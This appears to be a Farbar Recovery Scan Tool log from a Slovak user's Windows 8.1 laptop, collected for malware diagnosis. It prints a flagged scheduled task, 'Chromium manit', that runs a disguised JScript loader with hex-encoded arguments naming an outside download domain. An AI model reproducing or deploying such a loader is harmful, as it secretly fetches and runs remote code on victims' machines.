Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-03-2021
Ran by Alžbeta (administrator) on ALZBETA (Acer Aspire E5-471) (29-03-2021 13:23:20)
Running from C:\install
Loaded Profiles: Alžbeta
Platform: Windows 8.1 (Update) (X64) Language: Slovenčina (Slovensko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Windows\SysWOW64\UMonit64.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMEvent.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMLockHandler.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMTray.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Quick Access\QAEvent.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Quick Access\QAMsg.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Quick Access\RMSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerWinMonitor.exe
(Acer Incorporated -> acer) C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
(Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
(CyberLink -> ) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\eguiProxy.exe
(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\ekrn.exe
(Fortemedia Inc -> ) C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <13>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.72\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.72\GoogleCrashHandler64.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxTray.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Kerio Technologies, Inc. -> Kerio Technologies Inc.) C:\MailServer\mailserver.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\browserhost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Oracle America, Inc. -> Oracle Corporation) C:\MailServer\javaservices\jre\bin\javaw.exe
(philandro Software GmbH -> philandro Software GmbH) C:\Users\Alžbeta\Downloads\support.exe <4>
(Pokki, Inc. -> Pokki) C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostApp.exe <2>
(Pokki, Inc. -> Pokki) C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostAppUpdater.exe
(Pokki, Inc. -> Pokki) C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceStartMenuIndexer.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(SEIKO EPSON Corporation -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe <6>
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7825720 2014-03-26] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13672304 2014-03-21] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [AvastUI.exe] => "C:\Program Files\AVAST Software\Avast\AvLaunch.exe" /gui
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Security\ecmds.exe [175504 2020-10-29] (ESET, spol. s r.o. -> ESET)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [Opera Browser Assistant] => C:\Users\Alžbeta\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [2312792 2019-06-05] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91016584 2021-01-15] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Alžbeta\AppData\Local\Microsoft\Teams\Update.exe [2453720 2021-02-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\RunOnce: [Uninstall C:\Users\Alžbeta\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Alžbeta\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\RunOnce: [Application Restart #2] => C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostApp.exe [9561320 2020-09-17] (Pokki, Inc. -> Pokki)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\RunOnce: [Application Restart #1] => C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostApp.exe [9561320 2020-09-17] (Pokki, Inc. -> Pokki)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {045bcc95-b53d-11e8-8285-2c600c36c058} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {ae5fc0d7-fe1a-11e7-8278-2c600c36c058} - "E:\AutoRun.exe" 
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {d4408456-5472-11e9-8295-2c600c36c058} - "E:\HiSuiteDownLoader.exe" 
HKLM\...\Print\Monitors\EPSON L355 Series 64MonitorBE: C:\Windows\system32\E_YLMI4E.DLL [120320 2014-07-29] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\89.0.4389.90\Installer\chrmstp.exe [2021-03-18] (Google LLC -> Google LLC)
Startup: C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Odoslanie do aplikácie OneNote.lnk [2017-05-16]
ShortcutTarget: Odoslanie do aplikácie OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (No File)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0AB5BB00-9FA2-4C0C-980F-27944E85E3DF} - System32\Tasks\UMonitor Task => C:\Windows\SysWOW64\UMonit64.exe [53248 2014-02-26] () [File not signed]
Task: {0FC4D151-5326-4186-BF7D-3BF6513D0DEF} - System32\Tasks\abDocsDllLoader => C:\Program Files (x86)\Acer\abDocs\abDocsDllLoaderMonitor.exe [1769312 2017-09-28] (Acer Incorporated -> )
Task: {11C14BF1-8D4C-40D2-8C46-B6C328B89D88} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [100608 2014-08-30] (Acer Incorporated -> )
Task: {2E6EE475-0322-49BE-B15C-EC543E559279} - System32\Tasks\Launch Manager => C:\Program Files\Acer\Acer Launch Manager\LMLauncher.exe [439016 2014-09-11] (Acer Incorporated -> Acer Incorporate)
Task: {3881294B-FAD8-482E-8F49-13746D3C778C} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [65824 2017-09-26] (Acer Incorporated -> Acer Incorporated)
Task: {57E10253-3E88-4476-A515-E067829A97AE} - System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => C:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-25] (Mozilla Corporation -> Mozilla Foundation)
Task: {6A641CAF-F63D-4EB5-8886-D62C1BD2457C} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [216296 2014-03-13] (Acer Incorporated -> TODO: <Company name>)
Task: {74AFA71D-589E-4046-8826-36F0322AD707} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [41728 2014-08-30] (Acer Incorporated -> )
Task: {7B9D5FB0-3F73-4B71-8752-21BAFB8716B6} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
Task: {7D8B1308-013D-4F23-9832-017945D9FAA6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [376496 2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {854DCC3B-0EEC-4CA3-9663-35E0EEABD69D} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [1626328 2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {8DCE4F65-8B58-463C-8F88-96BD3BEFE504} - System32\Tasks\Recovery Management\Notification => C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe [490728 2014-06-17] (Acer Incorporated -> Acer Incorporated)
Task: {905729D0-9D40-4808-887B-D825D291B340} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe
Task: {A1B74B9B-A81D-4A47-85DC-84740FAB1E9E} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616832 2019-09-04] (Apple Inc. -> Apple Inc.)
Task: {AEB1D8A5-1517-43E4-BE2E-461B54085B6F} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
Task: {AF48B60B-77CD-43BB-A274-95951EF57CA4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-30] (Google Inc -> Google Inc.)
Task: {AF56A5CD-80D3-4B81-98F8-2E3BBBF68337} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTrayLauncher.exe [384232 2014-07-22] (Acer Incorporated -> Acer Incorporated)
Task: {B83BFA13-66B3-4AB0-807C-E063810C4D77} - System32\Tasks\Quick Access Quick Launcher => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [324328 2014-06-26] (Acer Incorporated -> Acer Incorporate)
Task: {BE1610AB-F081-474D-BD18-849EC583A734} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [474344 2014-06-09] (Acer Incorporated -> Acer Incorporated)
Task: {D16404B6-F5CD-44B1-9344-A72615079EB1} - System32\Tasks\Opera scheduled Autoupdate 1513103063 => C:\Users\Alžbeta\AppData\Local\Programs\Opera\launcher.exe [1793688 2021-03-11] (Opera Software AS -> Opera Software)
Task: {D65B0E1E-40C3-4B34-B7B9-13051E2901BE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [376496 2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {DFCB0507-7D66-4C4C-BA4E-49D464ACFEE3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-30] (Google Inc -> Google Inc.)
Task: {E09CEB12-3785-4ECD-8EB7-2C45CD3F05D3} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [324328 2014-06-26] (Acer Incorporated -> Acer Incorporate)
Task: {E47A6CB5-E87A-4C99-A73D-C0CC752EC045} - System32\Tasks\SweetLabs App Platform => C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostAppUpdater.exe [8064232 2020-09-17] (Pokki, Inc. -> Pokki)
Task: {F50A3388-AAED-4597-A11F-D36F90F62F32} - System32\Tasks\Chromium manit => "wscript.exe" "C:\ProgramData\{1212D771-9850-5DB7-1E96-C3F584D4483B}\cala.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6566696361" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6974616d656c" "//B" "//E:jscript" "--IsErIk" -> "C:\ProgramData\{1212D771-9850-5DB7-1E96-C3F584D4483B}\cala.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6566696361" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d (the data entry has 84 more characters). <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-31] (Apple Inc. -> Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{2FCAE69B-59C9-4966-AA3A-6515D315D60C}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4D5BD52C-CB48-4CBB-AA4D-5560078C82AD}: [DhcpNameServer] 192.168.1.1

Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Alžbeta\AppData\Local\Microsoft\Edge\User Data\Default [2021-03-25]

FireFox:
========
FF DefaultProfile: iuolivhx.default
FF ProfilePath: C:\Users\Alžbeta\AppData\Roaming\Mozilla\Firefox\Profiles\iuolivhx.default [2021-03-24]
FF Homepage: Mozilla\Firefox\Profiles\iuolivhx.default -> chrome://branding/locale/browserconfig.properties
FF Extension: (No Name) - C:\Program Files (x86)\McAfee\SiteAdvisor\e10ssaffplg.xpi [not found]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2021-03-16] [UpdateUrl:hxxps://sadownload.mcafee.com/products/SA/Win/xpi/webadvisor/update.json]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-05-14] (Foxit Corporation -> )
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-05-14] (Foxit Corporation -> )
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] (WildTangent Inc -> )
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\eset_security_config_overlay.js [2021-03-29]

Chrome: 
=======
CHR Profile: C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default [2021-03-29]
CHR Notifications: Default -> hxxps://bylinke.sk; hxxps://drive.google.com; hxxps://mail.naturpack.sk; hxxps://meet.google.com; hxxps://www.exasoft.cz; hxxps://www.freefilm.sk
CHR Extension: (Dokumenty) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-12-31]
CHR Extension: (Disk Google) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-26]
CHR Extension: (YouTube) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-31]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2021-03-22]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-03-16]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-01]
CHR Extension: (tTab) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\oonbcpdabjcggcklopgbdagbfnkhbgbe [2019-11-10]
CHR Extension: (Gmail) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-26]
CHR Extension: (Chrome Media Router) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-03-16]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe]
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe]

Opera: 
=======
OPR Profile: C:\Users\Alžbeta\AppData\Roaming\Opera Software\Opera Stable [2021-03-28]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Rich Hints Agent) - C:\Users\Alžbeta\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-02-01]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ekrn; C:\Program Files\ESET\ESET Security\ekrn.exe [2595360 2020-10-29] (ESET, spol. s r.o. -> ESET)
R3 ekrnEpfw; C:\Program Files\ESET\ESET Security\ekrn.exe [2595360 2020-10-29] (ESET, spol. s r.o. -> ESET)
R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [2573032 2014-07-22] (Acer Incorporated -> Acer Incorporated)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
S2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent Inc -> WildTangent)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-28] (Intel(R) Corporation) [File not signed]
R2 KerioMailServer; C:\MailServer\mailserver.exe [38268608 2018-04-29] (Kerio Technologies, Inc. -> Kerio Technologies Inc.)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [469736 2014-09-11] (Acer Incorporated -> Acer Incorporate)
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [958216 2021-02-07] (McAfee, LLC -> McAfee, LLC)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [458984 2014-06-26] (Acer Incorporated -> Acer Incorporate)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] (CyberLink -> )
R3 RMSvc; C:\Program Files\Acer\Acer Quick Access\RMSvc.exe [449768 2014-06-26] (Acer Incorporated -> Acer Incorporate)
R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [297288 2018-04-10] (Byte Technologies LLC -> Byte Technologies LLC.) <==== ATTENTION
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13216272 2020-03-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [234240 2014-07-15] (Acer Incorporated -> acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2014-03-26] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
S3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1424184 2014-04-22] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [160992 2020-10-26] (ESET, spol. s r.o. -> ESET)
R0 edevmon; C:\Windows\System32\DRIVERS\edevmon.sys [109360 2020-10-26] (ESET, spol. s r.o. -> ESET)
S0 eelam; C:\Windows\System32\DRIVERS\eelam.sys [15288 2020-09-17] (Microsoft Windows Early Launch Anti-malware Publisher -> ESET)
R1 ehdrv; C:\Windows\system32\DRIVERS\ehdrv.sys [190464 2020-10-26] (ESET, spol. s r.o. -> ESET)
R2 ekbdflt; C:\Windows\system32\DRIVERS\ekbdflt.sys [43720 2020-10-26] (ESET, spol. s r.o. -> ESET)
R1 epfw; C:\Windows\system32\DRIVERS\epfw.sys [70048 2020-10-26] (ESET, spol. s r.o. -> ESET)
R1 epfwwfp; C:\Windows\system32\DRIVERS\epfwwfp.sys [107784 2020-10-26] (ESET, spol. s r.o. -> ESET)
S3 GeneStor; C:\Windows\System32\drivers\GeneStor.sys [111336 2014-04-28] (GENESYS LOGIC, INC. -> GenesysLogic)
S3 iaLPSS_UART2; C:\Windows\System32\drivers\iaLPSS_UART2.sys [143864 2014-06-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-07-18] (Acer Incorporated -> Acer Incorporated)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [14680 2013-07-18] (Acer Incorporated -> Acer Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-03-29 13:09 - 2021-03-29 13:23 - 000000000 ____D C:\FRST
2021-03-29 13:07 - 2021-03-29 13:17 - 000000000 ____D C:\install
